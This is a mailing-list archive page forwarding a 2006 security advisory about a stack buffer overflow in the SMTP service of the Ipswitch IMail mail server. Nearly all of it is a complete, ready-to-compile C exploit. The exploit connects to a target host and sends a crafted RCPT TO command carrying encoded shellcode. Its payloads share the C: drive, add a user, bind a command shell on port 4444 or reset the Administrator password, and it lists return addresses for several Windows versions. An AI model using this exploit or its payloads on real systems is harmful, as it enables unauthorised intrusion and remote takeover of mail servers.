Security-Alerts mailing list archive (security-alerts@yandex-team.ru)
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[security-alerts] FW: [EXPL] Ipswitch IMail Server SMTP Service Buffer Overflow (Exploit)
> -----Original Message-----
> From: SecuriTeam [mailto:support@xxxxxxxxxxxxxx]
> Sent: Sunday, October 22, 2006 2:15 PM
> To: html-list@xxxxxxxxxxxxxx
> Subject: [EXPL] Ipswitch IMail Server SMTP Service Buffer
> Overflow (Exploit)
>
> The following security advisory is sent to the securiteam
> mailing list, and can be found at the SecuriTeam web site:
>
>
> - - promotion
>
> The SecuriTeam alerts list - Free, Accurate, Independent.
>
> Get your security news from a reliable source.
>
>
>
> - - - - - - - - -
>
>
>
> Ipswitch IMail Server SMTP Service Buffer Overflow (Exploit)
>
>
>
> Ipswitch IMail Server is a scalable, standards-based, Web
> browser accessible mail server that is suitable for medium to
> large businesses. Supported by Microsoft Windows operating
> systems, it features easy set up, remote administration via a
> Web browser, and protection from spam and viruses. It
> contains implementations of POP3, IMAP4, and SMTP services.
>
> There is a stack buffer overflow vulnerability in the IMail
> SMTP server component, specifically in the process of
> relaying requests containing a specially crafted RCPT command.
>
>
> Exploit:
> // IMail 2006 and 8.x SMTP Stack Overflow Exploit
> // coded by Greg Linares [glinares.code[at]gmail[dot]com
> //
> // This works on the following versions:
> // 2006 IMail prior to 2006.1 update
>
> #include <stdio.h>
> #include <string.h>
> #include <windows.h>
> #include <winsock.h>
>
> #pragma comment(lib,"wsock32.lib")
>
> int main(int argc, char *argv[])
> {
> static char overflow[1028];
>
> // PAYLOADS
> // Restricted Chars = 0x00 0x0D 0x0A 0x20 0x3e 0x22 (Maybe More)
>
> /* win32_exec - EXITFUNC=seh CMD=net share Export=C:\
> /unlimited Size=188 Encoder=ShikataGaNai */
> unsigned char RootShare[] =
> "\xdb\xcb\x29\xc9\xba\xfa\xef\x47\x2b\xb1\x2a\xd9\x74\x24\xf4\x58"
> "\x31\x50\x17\x83\xc0\x04\x03\xaa\xfc\xa5\xde\xb6\xeb\x6e\x21\x46"
> "\xec\xe5\x64\x7a\x67\x85\x63\xfa\x76\x99\xe7\xb5\x60\xee\xa7\x69"
> "\x90\x1b\x1e\xe2\xa6\x50\xa0\x1a\xf7\xa6\x3a\x4e\x7c\xe6\x49\x89"
> "\xbc\x2d\xbc\x94\xfc\x59\x4b\xad\x54\xba\xb0\xa4\xb1\x49\xe7\x62"
> "\x3b\xa5\x7e\xe1\x37\x72\xf4\xaa\x5b\x85\xe1\xdf\x78\x0e\xf4\x34"
> "\x09\x4c\xd3\xce\xc9\x5c\xdb\xaa\x46\xde\xeb\xb7\x99\xa7\x07\x3c"
> "\x59\x54\x93\x32\x46\xc9\x28\xda\x7e\xfa\x26\x91\xff\x4c\x38\xa5"
> "\xff\x27\x51\x99\xa0\x06\x54\x81\x08\xe0\x60\xc2\x75\x89\xc0\xac"
> "\x85\xe4\xe5\x73\x0e\x61\x1b\x01\xc0\xc6\x1b\xf2\xb3\x8d\x97\xdc"
> "\x38\x26\x39\x6e\xda\x96\xfc\xf6\x54\xb8\x8c\x72\xa8\x05\x4b\x26"
> "\xf2\xa6\xde\xb8\x9e\xd1\x4d\x2d\x2b\x47\xea\xad";
>
>
> /* win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex
> */
> unsigned char Win32Bind[] =
> "\x33\xc9\x83\xe9\xb0\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x93"
> "\x7b\xbd\x36\x83\xee\xfc\xe2\xf4\x6f\x11\x56\x7b\x7b\x82\x42\xc9"
> "\x6c\x1b\x36\x5a\xb7\x5f\x36\x73\xaf\xf0\xc1\x33\xeb\x7a\x52\xbd"
> "\xdc\x63\x36\x69\xb3\x7a\x56\x7f\x18\x4f\x36\x37\x7d\x4a\x7d\xaf"
> "\x3f\xff\x7d\x42\x94\xba\x77\x3b\x92\xb9\x56\xc2\xa8\x2f\x99\x1e"
> "\xe6\x9e\x36\x69\xb7\x7a\x56\x50\x18\x77\xf6\xbd\xcc\x67\xbc\xdd"
> "\x90\x57\x36\xbf\xff\x5f\xa1\x57\x50\x4a\x66\x52\x18\x38\x8d\xbd"
> "\xd3\x77\x36\x46\x8f\xd6\x36\x76\x9b\x25\xd5\xb8\xdd\x75\x51\x66"
> "\x6c\xad\xdb\x65\xf5\x13\x8e\x04\xfb\x0c\xce\x04\xcc\x2f\x42\xe6"
> "\xfb\xb0\x50\xca\xa8\x2b\x42\xe0\xcc\xf2\x58\x50\x12\x96\xb5\x34"
> "\xc6\x11\xbf\xc9\x43\x13\x64\x3f\x66\xd6\xea\xc9\x45\x28\xee\x65"
> "\xc0\x28\xfe\x65\xd0\x28\x42\xe6\xf5\x13\xac\x6a\xf5\x28\x34\xd7"
> "\x06\x13\x19\x2c\xe3\xbc\xea\xc9\x45\x11\xad\x67\xc6\x84\x6d\x5e"
> "\x37\xd6\x93\xdf\xc4\x84\x6b\x65\xc6\x84\x6d\x5e\x76\x32\x3b\x7f"
> "\xc4\x84\x6b\x66\xc7\x2f\xe8\xc9\x43\xe8\xd5\xd1\xea\xbd\xc4\x61"
> "\x6c\xad\xe8\xc9\x43\x1d\xd7\x52\xf5\x13\xde\x5b\x1a\x9e\xd7\x66"
> "\xca\x52\x71\xbf\x74\x11\xf9\xbf\x71\x4a\x7d\xc5\x39\x85\xff\x1b"
> "\x6d\x39\x91\xa5\x1e\x01\x85\x9d\x38\xd0\xd5\x44\x6d\xc8\xab\xc9"
> "\xe6\x3f\x42\xe0\xc8\x2c\xef\x67\xc2\x2a\xd7\x37\xc2\x2a\xe8\x67"
> "\x6c\xab\xd5\x9b\x4a\x7e\x73\x65\x6c\xad\xd7\xc9\x6c\x4c\x42\xe6"
> "\x18\x2c\x41\xb5\x57\x1f\x42\xe0\xc1\x84\x6d\x5e\x63\xf1\xb9\x69"
> "\xc0\x84\x6b\xc9\x43\x7b\xbd\x36";
>
> /* win32_adduser - PASS=Error EXITFUNC=seh USER=Error
> Size=236 Encoder=PexFnstenvSub */
> unsigned char AddUser[] =
> "\x2b\xc9\x83\xe9\xcb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb2"
> "\xe6\xaf\x6a\x83\xeb\xfc\xe2\xf4\x4e\x0e\xeb\x6a\xb2\xe6\x24\x2f"
> "\x8e\x6d\xd3\x6f\xca\xe7\x40\xe1\xfd\xfe\x24\x35\x92\xe7\x44\x23"
> "\x39\xd2\x24\x6b\x5c\xd7\x6f\xf3\x1e\x62\x6f\x1e\xb5\x27\x65\x67"
> "\xb3\x24\x44\x9e\x89\xb2\x8b\x6e\xc7\x03\x24\x35\x96\xe7\x44\x0c"
> "\x39\xea\xe4\xe1\xed\xfa\xae\x81\x39\xfa\x24\x6b\x59\x6f\xf3\x4e"
> "\xb6\x25\x9e\xaa\xd6\x6d\xef\x5a\x37\x26\xd7\x66\x39\xa6\xa3\xe1"
> "\xc2\xfa\x02\xe1\xda\xee\x44\x63\x39\x66\x1f\x6a\xb2\xe6\x24\x02"
> "\x8e\xb9\x9e\x9c\xd2\xb0\x26\x92\x31\x26\xd4\x3a\xda\x16\x25\x6e"
> "\xed\x8e\x37\x94\x38\xe8\xf8\x95\x55\x85\xc2\x0e\x9c\x83\xd7\x0f"
> "\x92\xc9\xcc\x4a\xdc\x83\xdb\x4a\xc7\x95\xca\x18\x92\xa3\xdd\x18"
> "\xdd\x94\x8f\x2f\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xc6\x89\x4c"
> "\x92\x88\xca\x1e\x92\x8a\xc0\x09\xd3\x8a\xc8\x18\xdd\x93\xdf\x4a"
> "\xf3\x82\xc2\x03\xdc\x8f\xdc\x1e\xc0\x87\xdb\x05\xc0\x95\x8f\x2f"
> "\xc0\x94\xc0\x18\x92\xc9\xee\x2e\xf6\xe6\xaf\x6a";
>
> /* win32_exec - CMD=net user Administrator "p@ssw0rd"
> Size=187 Encoder=Pex */
> unsigned char ChangeAdmin[] =
> "\x29\xc9\x83\xe9\xda\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e\x74"
> "\xb8\x4f\xba\x83\xee\xfc\xe2\xf4\x88\x50\x0b\xba\x74\xb8\xc4\xff"
> "\x48\x33\x33\xbf\x0c\xb9\xa0\x31\x3b\xa0\xc4\xe5\x54\xb9\xa4\xf3"
> "\xff\x8c\xc4\xbb\x9a\x89\x8f\x23\xd8\x3c\x8f\xce\x73\x79\x85\xb7"
> "\x75\x7a\xa4\x4e\x4f\xec\x6b\xbe\x01\x5d\xc4\xe5\x50\xb9\xa4\xdc"
> "\xff\xb4\x04\x31\x2b\xa4\x4e\x51\xff\xa4\xc4\xbb\x9f\x31\x13\x9e"
> "\x70\x7b\x7e\x7a\x10\x33\x0f\x8a\xf1\x78\x37\xb6\xff\xf8\x43\x31"
> "\x04\xa4\xe2\x31\x1c\xb0\xa4\xb3\xff\x38\xff\xba\x74\xb8\xc4\xd2"
> "\x48\xe7\x7e\x4c\x14\xee\xc6\x42\xf7\x78\x34\xea\x1c\x48\xc5\xbe"
> "\x2b\xd0\xd7\x44\xfe\xb6\x18\x45\x93\xd6\x2a\xce\x54\xcd\x3c\xdf"
> "\x06\x98\x0b\xc8\x15\xd3\x2a\x9a\x5b\xd9\x2b\xde\x74\xb8\x4f\xba";
>
>
> WSADATA wsaData;
>
> struct hostent *hp;
> struct sockaddr_in sockin;
> char buf[300], *check;
> int sockfd, bytes;
> int plen, i, JMP;
> char *hostname;
> unsigned short port;
>
> printf("IMail 2006 and 8.x SMTP 'RCPT TO:' Stack Overflow
> Exploit\n");
> printf("Coded by Greg Linares < glinares.code [at] GMAIL
> [dot] com >\n");
> if (argc <= 1)
> {
> printf("Usage: %s [hostname] [port] <Payload> <JMP>\n", argv[0]);
> printf("Default port is 25 \r\n");
> printf("==============================\n");
> printf("Payload Options: 1 = Default\n");
> printf("==============================\n");
> printf("1 = Share C:\\ as 'Export' Share\n");
> printf("2 = Add User 'Error' with Password 'Error'\n");
> printf("3 = Win32 Bind CMD to Port 4444\n");
> printf("4 = Change Administrator Password to 'p@ssw0rd'\n");
> printf("==============================\n");
> printf("JMP Options: 1 = Default\n");
> printf("==============================\n");
> printf("1 = IMAIL 8.x SMTPDLL.DLL [pop ebp, ret] 0x10036f71 \n");
> printf("2 = Win2003 SP1 English NTDLL.DLL [pop ebp, ret]
> 0x7c87d8af \n");
> printf("3 = Win2003 SP0 English USER32.DLL [pop ebp, ret]
> 0x77d02289 \n");
> printf("4 = WinXP SP2 English NTDLL.DLL [pop ebp, ret]
> 0x7c967e23 \n");
> printf("5 = WinXP SP1 - SP0 English USER32.DLL [pop ebp,
> ret] 0x71ab389c \n");
> printf("6 = Win2000 Universal English USER32.DLL [pop ebp,
> ret] 0x75021397 \n");
> printf("7 = Win2000 Universal French USER32.DLL [pop ebp,
> ret] 0x74fa1397 \n");
> printf("8 = Windows XP SP1 - SP2 German USER32.DLL [pop
> ebp, ret] 0x77d18c14 \r\n");
>
> exit(0);
> }
>
> hostname = argv[1];
> if (argv[2]) port = atoi(argv[2]);
> else port = atoi("25");
> if (argv[4]) JMP = atoi(argv[4]);
> else JMP = atoi("1");
>
> if (WSAStartup(MAKEWORD(1, 1), &wsaData) < 0)
> {
> fprintf(stderr, "Error setting up with WinSock v1.1\n");
> exit(-1);
> }
>
>
> hp = gethostbyname(hostname);
> if (hp == NULL)
> {
> printf("ERROR: Uknown host %s\n", hostname);
> printf("%s",hostname);
> exit(-1);
> }
>
> sockin.sin_family = hp->h_addrtype;
> sockin.sin_port = htons(port);
> sockin.sin_addr = *((struct in_addr *)hp->h_addr);
>
> if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
> {
> printf("ERROR: Socket Error\n");
> exit(-1);
> }
>
> if ((connect(sockfd, (struct sockaddr *) &sockin,
> sizeof(sockin))) == SOCKET_ERROR)
> {
> printf("ERROR: Connect Error\n");
> closesocket(sockfd);
> WSACleanup();
> exit(-1);
> }
>
> printf("Connected to [%s] on port [%d], sending overflow....\n",
> hostname, port);
>
>
> if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
> {
> printf("ERROR: Recv Error\n");
> closesocket(sockfd);
> WSACleanup();
> exit(1);
> }
>
> /* wait for SMTP service welcome*/
> buf[bytes] = '\0';
> check = strstr(buf, "220");
> if (check == NULL)
> {
> printf("ERROR: NO response from SMTP service\n");
> closesocket(sockfd);
> WSACleanup();
> exit(-1);
> }
>
>
> // JMP to EAX = Results in a Corrupted Stack
> // so instead we POP EBP, RET to restore pointer and then return
> // this causes code procedure to continue
> /*
> ['IMail 8.x Universal', 0x10036f71 ],
> ['Windows 2003 SP1 English', 0x7c87d8af ],
> ['Windows 2003 SP0 English', 0x77d5c14c ],
> ['Windows XP SP2 English', 0x7c967e23 ],
> ['Windows XP SP1 English', 0x71ab389c ],
> ['Windows XP SP0 English', 0x71ab389c ],
> ['Windows 2000 Universal English', 0x75021397 ],
> ['Windows 2000 Universal French', 0x74fa1397],
> ['Windows XP SP1 - SP2 German', 0x77d18c14],
> */
> char Exp[] = "RCPT TO: <@"; // This stores our JMP
> between the @ and :
> char Win2k3SP1E[] = "\xaf\xd8\x87\x7c:"; //Win2k3 SP1
> English NTDLL.DLL [pop ebp, ret] 0x7c87d8af
> char WinXPSP2E[] = "\x23\x7e\x96\x7c:"; //WinXP SP2
> English NTDLL.DLL [pop ebp, ret] 0x7c967e23
> char IMail815[] = "\x71\x6f\x03\x10:"; //IMAIL 8.15
> SMTPDLL.DLL [pop ebp, ret] 0x10036f71
> char Win2k3SP0E[] = "\x4c\xc1\xd5\x77:"; //Win2k3 SP0
> English USER32.DLL [pop ebp, ret]0x77d5c14c
> char WinXPSP2[] = "\x23\x7e\x96\x7c:"; //WinXP SP2 English
> USER32.DLL [pop ebp, ret] 0x7c967e23
> char WinXPSP1[] = "\x9c\x38\xab\x71:"; //WinXP SP1 and 0
> English U32 [pop ebp, ret]0x71ab389c
> char Win2KE[] = "\x97\x31\x02\x75:"; //Win2k English All SPs
> [pop ebp, ret]0x75021397
> char Win2KF[] = "\x97\x13\xfa\x74:"; // As above except
> French Win2k [pop ebp, ret]0x74fa1397
> char WinXPG[] = "\x14\x8c\xd1\x77:"; //WinXP SP1 - SP2
> German U32 [pop ebp, ret]0x77d18c14
>
> char tail[] = "SSS>\n"; // This closes the RCPT cmd. Any
> characters work.
> // Another overflow can be achieved by using an overly long
> buffer after RCPT TO: on 8.15 systems
> // After around 560 bytes or so EIP gets overwritten. But
> this method is easier to exploit and it works
> // On all versions from 8.x to 2006 (9.x?)
> char StackS[] = "\x81\xc4\xff\xef\xff\xff\x44"; // Stabolize
> Stack prior to payload.
> memset(overflow, 0, 1028);
> strcat(overflow, Exp);
> if (JMP == 1)
> {
> printf("Using IMail 8.15 SMTDP.DLL JMP\n");
> strcat(overflow, IMail815);
> } else if (JMP == 2)
> {
> printf("Using Win2003 SP1 NTDLL.DLL JMP\n");
> strcat(overflow, Win2k3SP1E);
> } else if (JMP == 3)
> {
> printf("Using Win2003 SP0 USER32.DLL JMP\n");
> strcat(overflow, Win2k3SP0E);
> } else if (JMP == 4)
> {
> printf("Using WinXP SP2 NTDLL.DLL JMP\n");
> strcat(overflow, WinXPSP2E);
> } else if (JMP == 5)
> {
> printf("Using WinXP SP1 and SP0 USER32.DLL JMP\n");
> strcat(overflow, WinXPSP1);
> } else if (JMP == 6)
> {
> printf("Using Win2000 Universal English USER32.DLL JMP\n");
> strcat(overflow, Win2KE);
> } else if (JMP == 7)
> {
> printf("Using Win2000 Universal French USER32.DLL JMP\n");
> strcat(overflow, Win2KF);
> } else if (JMP == 8)
> {
> printf("Using WinXP SP2 and SP1 German USER32.DLL JMP\n");
> strcat(overflow, WinXPG);
> } else {
> printf("Using IMail 8.15 SMTDP.DLL JMP\n");
> strcat(overflow, IMail815);
> }
>
>
>
> // Setup Payload Options
> if (atoi(argv[3]) == 1)
> {
> printf("Using Root Share Payload\n");
> plen = 544 - ((strlen(RootShare) + strlen(StackS)));
> for (i=0; i<plen; i++){
> strcat(overflow, "\x90");
> }
> strcat(overflow, StackS);
> strcat(overflow, RootShare);
>
> } else if (atoi(argv[3]) == 2)
> {
> printf("Using Add User Payload\n");
> plen = 544 - ((strlen(AddUser)+ strlen(StackS)));
> for (i=0; i<plen; i++){
> strcat(overflow, "\x90");
> }
> strcat(overflow, StackS);
> strcat(overflow, AddUser);
> } else if (atoi(argv[3]) == 3)
> {
> printf("Using Win32 CMD Bind Payload\n");
> plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
> for (i=0; i<plen; i++){
> strcat(overflow, "\x90");
> }
> strcat(overflow, StackS);
> strcat(overflow, Win32Bind);
> } else if (atoi(argv[3]) == 4)
> {
> printf("Using Change Admin Password Payload (Pwd = 'p@ssw0rd')\n");
> plen = 544 - ((strlen(ChangeAdmin) + strlen(StackS)));
> for (i=0; i<plen; i++){
> strcat(overflow, "\x90");
> }
> strcat(overflow, StackS);
> strcat(overflow, ChangeAdmin);
> } else
> {
> printf("Using Win32 CMD Bind Payload\n");
> plen = 544 - ((strlen(Win32Bind) + strlen(StackS)));
> for (i=0; i<plen; i++){
> strcat(overflow, "\x90");
> }
> strcat(overflow, StackS);
> strcat(overflow, Win32Bind);
> }
>
> // Dont forget to add the trailing characters to set up
> stack overflow
> strcat(overflow, tail);
>
>
>
> // Connect to SMTP Server and Setup Up Email
> char EHLO[] = "EHLO \r\n";
> char MF[] = "MAIL FROM <TEST@TEST> \r\n";
> send(sockfd, EHLO, strlen(EHLO), 0);
> Sleep(1000);
> send(sockfd, MF, strlen(MF), 0);
> Sleep(1000);
>
>
> if (send(sockfd, overflow, strlen(overflow),0) == SOCKET_ERROR)
> {
> printf("ERROR: Send Error\n");
> closesocket(sockfd);
> WSACleanup();
> exit(-1);
> }
>
> printf("Exploit Sent.....\r\n");
> if (atoi(argv[3]) == 3)
> {
> printf("Check Shell on Port 4444\n");
> closesocket(sockfd);
> WSACleanup();
> exit(0);
> }
>
> printf("Checking If Exploit Executed....\r\n");
> Sleep(1000);
> closesocket(sockfd);
>
> sockin.sin_family = hp->h_addrtype;
> sockin.sin_port = htons(port);
> sockin.sin_addr = *((struct in_addr *)hp->h_addr);
>
> if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == SOCKET_ERROR)
> {
> printf("ERROR: Socket Error\n");
> exit(-1);
> }
>
> if ((connect(sockfd, (struct sockaddr *) &sockin,
> sizeof(sockin))) == SOCKET_ERROR)
> {
> printf("Exploit Successfully Delivered!\n");
> closesocket(sockfd);
> WSACleanup();
> printf("Don't Forget to Restart the IMAIL SMTP Service to
> Re-exploit!");
> exit(0);
> }
> printf("...");
> if ((bytes = recv(sockfd, buf, 300, 0)) == SOCKET_ERROR)
> {
> printf("Exploit Successfully Delivered!\n");
> closesocket(sockfd);
> WSACleanup();
> printf("Don't Forget to Restart the IMAIL SMTP Service to
> Re-exploit!");
> exit(0);
> }
>
> /* wait for SMTP service welcome*/
> buf[bytes] = '\0';
> check = strstr(buf, "220");
> if (check == NULL)
> {
> printf("Exploit Successfully Delivered!\n");
> closesocket(sockfd);
> WSACleanup();
> printf("Don't Forget to Restart the IMAIL SMTP Service to
> Re-exploit!");
> exit(0);
> }
>
> printf("Exploit Failed: Try A different JMP Method or Payload\n");
> closesocket(sockfd);
> WSACleanup();
> exit (1);
> }
>
>
> Additional Information:
> The information has been provided by milw0rm.
> The original article can be found at:
>
>
>
> ==============================================================
> ==================
>
>
>
>
>
> This bulletin is sent to members of the SecuriTeam mailing list.
> To unsubscribe from the list, send mail with an empty subject
> line and body to: html-list-unsubscribe@xxxxxxxxxxxxxx
> In order to subscribe to the mailing list and receive
> advisories in HTML format, simply forward this email to:
> html-list-subscribe@xxxxxxxxxxxxxx
>
>
>
> ==============================================================
> ==================
> ==============================================================
> ==================
>
> DISCLAIMER:
> The information in this bulletin is provided "AS IS" without
> warranty of any kind.
> In no event shall we be liable for any damages whatsoever
> including direct, indirect, incidental, consequential, loss
> of business profits or special damages.
>
>
>
>
>
>
|
